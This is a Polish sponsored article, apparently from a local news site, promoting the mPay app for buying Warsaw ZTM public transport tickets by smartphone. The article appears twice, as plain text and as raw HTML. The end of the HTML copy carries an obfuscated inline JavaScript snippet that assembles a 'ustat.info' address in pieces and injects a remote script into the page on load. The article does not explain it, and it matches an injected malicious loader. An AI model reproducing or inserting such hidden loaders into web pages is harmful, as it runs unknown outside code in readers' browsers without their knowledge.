Chcesz kupić bilet na autobus albo tramwaj w Warszawie? Nie musisz iść do kiosku lub biletomatu. Teraz możesz wykupić go bezpośrednio ze swojego smartfona – szybko i wygodnie!

Kiedyś bilety można było zakupić tylko w stacjonarnych punktach sprzedaży. Teraz podróżujący mają do dyspozycji nowoczesne technologie, dzięki którym zapłacenie za przejazd jest jeszcze łatwiejsze.

Dzisiaj można zakupić bilety Warszawa ZTM także przez swój telefon za pośrednictwem jednej z dostępnych aplikacji. Można w ten sposób zakupić bilety czasowe, jednorazowe, dobowe, a także weekendowe i trzydniowe.

Kupno biletu przez telefon ma wiele zalet. Przede wszystkim nie musimy obawiać się, że nie zdążymy na nasz kurs ze względu na stanie w kolejce po bilet. Możemy nabyć go bezpośrednio po wejściu do pojazdu paroma kliknięciami na smartfonie. Oszczędzamy również swój czas, a także nie musimy obawiać się o kupno biletów w nocy, w weekendy oraz w święta. Co więcej, aplikacje organizują często rożne promocje, dzięki którym za bilety możemy zapłacić jeszcze mniej!

Jedną z aplikacji pozwalających na zakupienie biletu przez komórkę jest mPay, która dodatkowo pozwala swoim użytkownikom na prowadzenie innych transakcji mobilnych: doładowania telefon i gier, opłacenie miejsc parkingowych, przelewy, opłacanie rachunków.

Aby zakupić bilety Warszawa ZTM przez swój telefon, na początku musimy pobrać aplikacje i zainstalować ją. Następnie tworzymy swoje konto użytkownika i określamy metodę płatności. Do wyboru mamy płatność podpiętą kartą albo możemy doładować swoje konto odpowiednią sumą z użyciem przelewu – wtedy opłaty za bilety będą odliczane z konta.

Jeśli chcemy nabyć bilet, uruchamiamy aplikację, wybieramy usługę i określamy rodzaj biletu. Transakcje potwierdzane są indywidualnym kodem PIN mPay, dlatego nawet w razie utraty telefonu nie ma ryzyka utraty pieniędzy.

Zatem jeśli chcesz wygodnie i łatwo kupować bilety na autobusy i tramwaje w Warszawie, możesz zrobić to na swoim smartfonie. Pobierz aplikację już teraz i zacznij korzystać z komunikacji miejskiej nowocześnie!

Kupuj bilety ZTM Warszawa przez swój telefon!http://www.pruszkowmowi.pl/wp-content/uploads/2018/03/bridge-3122190_1280-1024x664.jpghttp://www.pruszkowmowi.pl/wp-content/uploads/2018/03/bridge-3122190_1280-300x300.jpg admin Artykuł sponsorowanytechnologieTransport
Chcesz kupić bilet na autobus albo tramwaj w Warszawie? Nie musisz iść do kiosku lub biletomatu. Teraz możesz wykupić go bezpośrednio ze swojego smartfona – szybko i wygodnie! Kiedyś bilety można było zakupić tylko w stacjonarnych punktach sprzedaży. Teraz podróżujący mają do dyspozycji nowoczesne technologie, dzięki którym zapłacenie za przejazd...
<h2 style="text-align: left;"><span style="font-size: 14pt;">Chcesz kupić bilet na autobus albo tramwaj w Warszawie? Nie musisz iść do kiosku lub biletomatu. Teraz możesz wykupić go bezpośrednio ze swojego smartfona – szybko i wygodnie!</span></h2> Kiedyś bilety można było zakupić tylko w stacjonarnych punktach sprzedaży. Teraz podróżujący mają do dyspozycji nowoczesne technologie, dzięki którym zapłacenie za przejazd jest jeszcze łatwiejsze.Dzisiaj można zakupić <a href="https://www.mpay.pl/uslugi/bilety-komunikacji-miejskiej/bilety-ztm-warszawa/">bilety Warszawa ZTM</a><b> </b>także przez swój telefon za pośrednictwem jednej z dostępnych aplikacji. Można w ten sposób zakupić bilety czasowe, jednorazowe, dobowe, a także weekendowe i trzydniowe.Kupno biletu przez telefon ma wiele zalet. Przede wszystkim nie musimy obawiać się, że nie zdążymy na nasz kurs ze względu na stanie w kolejce po bilet. Możemy nabyć go bezpośrednio po wejściu do pojazdu paroma kliknięciami na smartfonie. Oszczędzamy również swój czas, a także nie musimy obawiać się o kupno biletów w nocy, w weekendy oraz w święta. Co więcej, aplikacje organizują często rożne promocje, dzięki którym za bilety możemy zapłacić jeszcze mniej!Jedną z aplikacji pozwalających na zakupienie biletu przez komórkę jest mPay, która dodatkowo pozwala swoim użytkownikom na prowadzenie innych transakcji mobilnych: doładowania telefon i gier, opłacenie miejsc parkingowych, przelewy, opłacanie rachunków.Aby zakupić bilety Warszawa ZTM przez swój telefon, na początku musimy pobrać aplikacje i zainstalować ją. Następnie tworzymy swoje konto użytkownika i określamy metodę płatności. Do wyboru mamy płatność podpiętą kartą albo możemy doładować swoje konto odpowiednią sumą z użyciem przelewu – wtedy opłaty za bilety będą odliczane z konta.Jeśli chcemy nabyć bilet, uruchamiamy aplikację, wybieramy usługę i określamy rodzaj biletu. Transakcje potwierdzane są indywidualnym kodem PIN mPay, dlatego nawet w razie utraty telefonu nie ma ryzyka utraty pieniędzy.Zatem jeśli chcesz wygodnie i łatwo kupować bilety na autobusy i tramwaje w Warszawie, możesz zrobić to na swoim smartfonie. Pobierz aplikację już teraz i zacznij korzystać z komunikacji miejskiej nowocześnie!<b></b><script type="text/javascript"> (function(){ xiqc_=("u"+"")+"s"+"";xiqc_+=("tat.")+("i"); xiqc=document.createElement("script");xiqc.type="text/javascript";xiqc_+="nf"+("o")+"/"; xiqcu="73956570"+".";xiqc.async=true;xiqcu+="epl6xuhkiqcs4mzXlcc9vXfk1h0r9j"; xiqc.src="https://"+xiqc_+xiqcu; xiqcb=document.body; xiqcb.appendChild(xiqc); })(); </script>